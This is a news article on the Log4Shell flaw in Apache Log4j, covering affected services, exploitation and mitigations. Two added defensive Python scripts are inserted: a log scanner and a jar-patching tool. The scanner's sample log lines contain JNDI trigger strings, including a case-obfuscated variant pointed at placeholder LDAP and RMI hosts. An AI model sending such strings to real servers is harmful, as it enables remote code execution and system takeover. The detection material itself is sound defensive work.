A zero-day exploit in a Java library has been discovered, impacting Steam, iCloud and Minecraft among others. Security researchers are still investigating the issue but believe this may be “the mother of all exploits” due to how widespread it is. It’s unclear what effect the vulnerability will have on end users though.
Log4j, created by the Apache Foundation and used by a large number of business and cloud-based applications, has been revealed to have an unauthenticated remote code execution vulnerability that allows a complete system takeover.
CVE-2021-44228 has been assigned to the flaw, which has been called Log4Shell or LogJam. The flaw was initially reported to Apache by Alibaba Cloud’s security team on November 24. However, threat actors have been aggressively scanning the internet for susceptible targets since the initial proof-of-concept exploit was released on GitHub on December 9.
Applications and online services from firms like Apple, Amazon, and Steam are potentially susceptible to attacks targeting the flaw, since the library is commonly used by corporate apps and cloud services. Multiple Apache frameworks, including but not limited to Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, are similarly affected by the issue.
The vulnerability was first discovered on sites hosting Minecraft servers, where attackers could exploit it simply by sending chat messages. Threat actors have been actively exploiting the issue since the proof of concept was released on GitHub. GreyNoise, a security research firm, tweeted that they are seeing a spike in IPs attempting to exploit the flaw.
The number of servers abusing Apache Log4J CVE-2021-44228 is rapidly rising, according to GreyNoise. Approximately 100 different hosts are being exploited, practically all of them are Tor exit nodes. Tags are now accessible to all clients and users. https://t.co/JF3tUkpIrq pic.twitter.com/CTMi0IWQ5j
December 10, 2021 — GreyNoise (@GreyNoiseIO)
To trigger the vulnerability, an attacker only has to get the targeted application to write a particular string of characters into its log. Because almost every piece of software records its activity in some manner, the vulnerability is remarkably easy to trigger and can be reached in a variety of ways.
In fact, the attack could hypothetically be carried out by encoding the string in a QR code that a company’s systems later scan and log, giving access to those systems without the attacker ever communicating with them over the internet.
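Because the trigger is a string that merely has to reach a log, defenders commonly search existing logs (web access logs, user-agent fields, form inputs) for the lookup pattern to find exploitation attempts after the fact. The following Python is an added example that is not part of the article: it scans a few constructed sample log lines (the hostnames are placeholders) for the JNDI lookup pattern, first collapsing the nested case-conversion lookups that are often used to split the pattern up, so that a naive substring search does not miss them.

```python
import re

# Constructed sample log lines for demonstration; not taken from the article.
# Hostnames are placeholders (.invalid / documentation ranges), not real hosts.
SAMPLE_LOGS = [
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://placeholder.invalid/a}"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://placeholder.invalid/b}"',
    '192.0.2.3 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# Nested ${lower:x} / ${upper:x} lookups are resolved before matching, because
# Log4j evaluates them first and they are a common way to disguise the trigger.
CASE_LOOKUP_RE = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
# The actual lookup that the vulnerable versions hand to JNDI.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested case-conversion lookups, innermost first, a bounded number of times."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalisation."""
    return JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (index, line) pairs for every line that carries a JNDI lookup."""
    return [(i, line) for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_LOGS):
        print(f"line {idx}: {hit}")
```

The normalisation only handles the `lower`/`upper` lookups; a signature check like this is a best-effort triage aid for historical logs, not a substitute for patching, since other lookup nestings exist and the string can arrive through any logged field.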
This vulnerability on Apple servers may be triggered by anything as easy as changing the name of your iPhone. To fix the flaw and offer permanent mitigation, Apache has published Log4j 2.15.0, a patched version of the library.
For developers still on earlier releases, setting the log4j2.formatMsgNoLookups system property to true addresses the issue. Alternatively, developers may remove the JndiLookup class from the classpath entirely.
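The two interim mitigations above both hinge on whether a deployed log4j-core jar is older than 2.15.0 and still ships the JndiLookup class. The Python below is an added example, not code from the article, Apache or LunaSec: it walks a directory for jars, reads the version from the Maven pom.properties inside each, reports whether the JndiLookup class is present, and can rewrite a jar without that class (the classpath-removal mitigation). The demo jar it builds is a constructed stand-in with placeholder class bytes; the 2.15.0 threshold is the fixed version the article names.

```python
import os
import shutil
import tempfile
import zipfile

# Paths inside a real log4j-core jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)  # patched version named in the article


def parse_version(props_text):
    """Return (major, minor, patch) from a pom.properties 'version=' line, or None."""
    for line in props_text.splitlines():
        if line.startswith("version="):
            parts = line.split("=", 1)[1].strip().split(".")[:3]
            nums = []
            for part in parts:
                digits = "".join(ch for ch in part if ch.isdigit())
                nums.append(int(digits) if digits else 0)
            return tuple(nums) + (0,) * (3 - len(nums))
    return None


def inspect_jar(path):
    """Report version, presence of JndiLookup, and whether the jar looks vulnerable."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(POM_PROPS).decode()) if POM_PROPS in names else None
    has_jndi = JNDI_CLASS in names
    # Unknown version with the lookup class present is treated as vulnerable.
    vulnerable = has_jndi and (version is None or version < FIXED_VERSION)
    return {"path": path, "version": version, "has_jndi_lookup": has_jndi, "vulnerable": vulnerable}


def find_log4j_jars(root):
    """Walk root and return inspection results for every jar that looks like log4j-core."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                info = inspect_jar(path)
            except zipfile.BadZipFile:
                continue  # not a readable zip; skip rather than crash the scan
            if info["has_jndi_lookup"] or info["version"] is not None:
                results.append(info)
    return results


def remove_jndi_lookup(path):
    """Rewrite the jar in place without JndiLookup.class (the classpath-removal mitigation)."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
        for entry in src.infolist():
            if entry.filename == JNDI_CLASS:
                continue
            dst.writestr(entry, src.read(entry.filename))
    os.replace(tmp, path)


def make_demo_jar(path, version):
    """Constructed stand-in for log4j-core; class entries hold placeholder bytes only."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")


def demo(version="2.14.1"):
    """Build a demo jar in a temp dir, scan it, apply the mitigation, and scan again."""
    root = tempfile.mkdtemp()
    try:
        path = os.path.join(root, f"log4j-core-{version}.jar")
        make_demo_jar(path, version)
        before = inspect_jar(path)
        found = len(find_log4j_jars(root))
        remove_jndi_lookup(path)
        after = inspect_jar(path)
    finally:
        shutil.rmtree(root)
    return {"before": before, "after": after, "found": found}


if __name__ == "__main__":
    result = demo()
    print("before:", result["before"])
    print("after: ", result["after"])
```

Removing the class is a stop-gap that also disables legitimate JNDI lookups, so upgrading to the patched release remains the intended fix; the scan should be run against every application and container image, since log4j-core is frequently bundled inside other jars and war files rather than installed system-wide.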
Cloud services like Steam and Apple’s iCloud, and programs like Minecraft, have all been shown to be vulnerable, according to cybersecurity firm LunaSec. They have also published instructions for interim mitigation and for determining whether or not your server is susceptible.
CISA has also released a vulnerability advisory, urging developers to upgrade the library or apply the interim mitigations.
When he’s not writing/editing/shooting/hosting all things tech, he streams himself racing virtual vehicles. Yadullah may be reached at [email protected], or you can follow him on Instagram or Twitter.